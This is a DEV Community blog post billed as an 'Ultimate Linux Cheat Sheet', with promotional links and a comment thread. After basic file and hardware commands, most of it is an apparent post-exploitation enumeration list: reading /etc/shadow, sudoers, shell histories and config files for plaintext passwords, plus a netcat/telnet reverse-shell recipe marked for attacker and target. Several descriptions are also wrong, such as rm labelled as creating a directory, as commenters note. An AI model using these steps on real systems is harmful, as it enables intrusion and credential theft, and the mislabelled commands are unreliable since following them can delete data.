DEV Community

Cover image for Ultimate Linux Cheat Sheet
Justin Varghese for For Community

Posted on • Edited on

Ultimate Linux Cheat Sheet

*Do you want to become ethical hacker and want to know how hackers hack in Real World. Join the telegram group and be a
part of us *

Telegram = https://t.me/infosecbugbounty

Introduction

Linux commands may seem intimidating at first glance if you are not used to using the terminal. There are many commands for performing operations and processes on your Linux system.

No matter whether you are new to Linux or an experienced user, having a list of common commands close at hand is helpful.

In this tutorial, you will find commonly used Linux commands as well list of common Linux commands
Important: Depending on your system setup, some of the commands below may require invoking sudo to be executed

A list of all Linux commands commonly used with Linux operating systems.
Linux Commands List

File Commands
List files in the directory:

ls
List all files (shows hidden files):

ls -a
Show directory you are currently working in:

pwd
Create a new directory:

mkdir [directory]
Make a new directory

*rm [file_name] *
Remove a directory recursively

rm -rf [directory_name]
It deletes the directory

cp [file_name1] [file_name2]
Recursively copy the contents of one file to a second file:

cp -r [directory_name1] [directory_name2]
Rename [file_name1] to [file_name2] with the command:

mv [file_name1] [file_name2]
Create a symbolic link to a file:

ln -s /path/to/[file_name] [link_name]
Create a new file:

touch [file_name]

Hardware Information

Show bootup messages:

dmesg
See CPU information:

cat /proc/cpuinfo
Display free and used memory with:

free -h
List hardware configuration information:

lshw
See information about block devices:

lsblk
Show PCI devices in a tree-like diagram:

lspci -tv
Display USB devices in a tree-like diagram:

lsusb -tv
Show hardware information from the BIOS:

dmidecode
Display disk data information:

hdparm -i /dev/disk
Conduct a read-speed test on device/disk:

hdparm -tT /dev/[device]
Test for unreadable blocks on device/disk:

badblocks -s /dev/[device]

Operating System
What's the distribution type? What version?

cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release

What's the kernel version? Is it 64-bit?

cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-

What can be learnt from the environmental variables?

cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set

Is there a printer?

lpstat -a

Applications & Services

What services are running? Which service has which user privilege?

ps aux
ps -ef
top
cat /etc/services

Which service(s) are been running by root? Of these services, which are vulnerable

ps aux | grep root
ps -ef | grep root

What applications are installed? What version are they? Are they currently running?

ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/

Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?

cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.r./

What jobs are scheduled?

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Any plain text usernames and/or passwords?

grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla

Communications & Networking
What NIC(s) does the system have? Is it connected to another network?

/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network

What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?

cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname

What other users & hosts are communicating with the system?

lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w

Whats cached? IP and/or MAC addresses

arp -e
route
/sbin/route -nee

Is packet sniffing possible? What can be seen? Listen to live traffic

tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21

Note: tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]

Have you got a shell? Can you interact with the system?

nc -lvp 4444 # Attacker. Input (Commands)
nc -lvp 4445 # Attacker. Ouput (Results)
telnet [attackers ip] 44444 | /bin/sh | [local ip] 44445 # On the targets system. Use the attackers IP!

Confidential Information & Users
Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?**

id
who
w
last
cat /etc/passwd | cut -d: -f1 # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
cat /etc/sudoers
sudo -l

What sensitive files can be found?

cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/

Anything "interesting" in the home directorie(s)? If it's possible to access

ls -ahlR /root/
ls -ahlR /home/

Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords

cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg

What has the user being doing? Is there any password in plain text? What have they been editing?

cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history

What user information can be found?

cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root

Hey Guys we just dropped our 1st video on YouTube at 10 Am (IST) on 16 January 2020 .Please hit that subscribe button and make sure you smash that like button .Hotstar+Disney is a very famous streaming and entertainment service in India with more than 27 millon paid viewers and 300 millon monthly active users . We would love to hear your response .

https://www.youtube.com/watch?v=4pjpHUN28kk

Alt Text

Be a part of us 🚀 🚀
Telegram https://t.me/forthecommunity
Discord https://discord.com/invite/QsAqC4yKkm
Facebook https://www.facebook.com/forcommunity.tech
Youtube https://www.youtube.com/watch?v=4pjpHUN28kk

Top comments (33)

Collapse
 
darnahsan profile image
Ahsan Nabi Dar

rm -rf [directory_name]
Copy the contents of one file to another file:

I hope no one tries to copy through this 😅

Collapse
 
alexgeorgiev17 profile image
Alex Georgiev

Good catch! @justinnn07 you can edit this!

Collapse
 
justinnn07 profile image
Justin Varghese

Sure bro!

Thread Thread
 
alexgeorgiev17 profile image
Alex Georgiev

Wonderful, great post!

Thread Thread
 
justinnn07 profile image
Justin Varghese

Thanks bro

Collapse
 
justinnn07 profile image
Justin Varghese

It deleted the folder na bro?

Collapse
 
binmansoor11 profile image
Talha Mansoor

😂😂😂

Collapse
 
mathitejeda profile image
Mathias Tejeda

I thing I've done something wrong because i copied my entire Linux distro to hell

Collapse
 
lorenzoblog profile image
Lorenzo
Collapse
 
justinnn07 profile image
Justin Varghese

Cool, go ahead!

Collapse
 
lorenzoblog profile image
Lorenzo • Edited

Added!
If you want please leave a like (I'm trying to reach the top 10)

Thread Thread
 
justinnn07 profile image
Justin Varghese

For sure dude!

Thread Thread
 
lorenzoblog profile image
Lorenzo

I propose that I put your cheat sheet in a more evident way (I write "go check this cool cheat sheets", I put a more visible link, a photo ...) and in exchange in your article you add the liquid tag of my compilation (at the end or at the top).

Thread Thread
 
justinnn07 profile image
Justin Varghese

Yeah thanks man!

Thread Thread
 
lorenzoblog profile image
Lorenzo

I did my part, it's your turn now.

You found it in part 2 - Extra - Your cheat sheets - Linux!

Thread Thread
 
justinnn07 profile image
Justin Varghese

What should I do bro?

Thread Thread
 
lorenzoblog profile image
Lorenzo

You can add a liquid tag to my article at the top / the end of this cheat sheet with a little engagement sentence.

Link:
dev.to/devlorenzo/the-ultimate-com...

Thread Thread
 
justinnn07 profile image
Justin Varghese

Ok

Thread Thread
 
lorenzoblog profile image
Lorenzo

then?

Collapse
 
syntaxseed profile image
SyntaxSeed (Sherri W)

rm... Always type rm [dir name] first.... then go back & add the -rf after.

Trust me. 🤣

Collapse
 
justinnn07 profile image
Justin Varghese

I k it was typing mistake aff

Collapse
 
kiransethu46 profile image
Kiran Sethumadhavan

Great Job Bro 👍

Collapse
 
justinnn07 profile image
Justin Varghese

Abe bro 😶🙄

Collapse
 
kabeer1choudary profile image
kabeer1choudary

Nice one .👍🏿

Collapse
 
justinnn07 profile image
Justin Varghese

thanks bhai

Collapse
 
kaperskyguru profile image
Solomon Eseme

Wait!!! What!!!! I just saw this, or is my eyes paining me?

rm -r [directory_name]
Recursively remove a directory without requiring confirmation:

Please don't copy with the command above.

Collapse
 
justinnn07 profile image
Justin Varghese

Its RM -rf na 😅🙄

Collapse
 
mihara17 profile image
Michelle Te Whata

Thanks for sharing

Collapse
 
caribe profile image
Vincenzo Buttazzo

lscpu is also a good way to know details about your processor.

Collapse
 
omarfar25 profile image
Omar Faruque

Isn't mkdir => make a new directory.??

Collapse
 
vidhyavarshanyjs profile image
Vidhya Varshany

Nope it creates a folder .You can use it like mkdir "".

Collapse
 
justinnn07 profile image
Justin Varghese

Yes

Collapse
 
justinnn07 profile image
Justin Varghese

Lol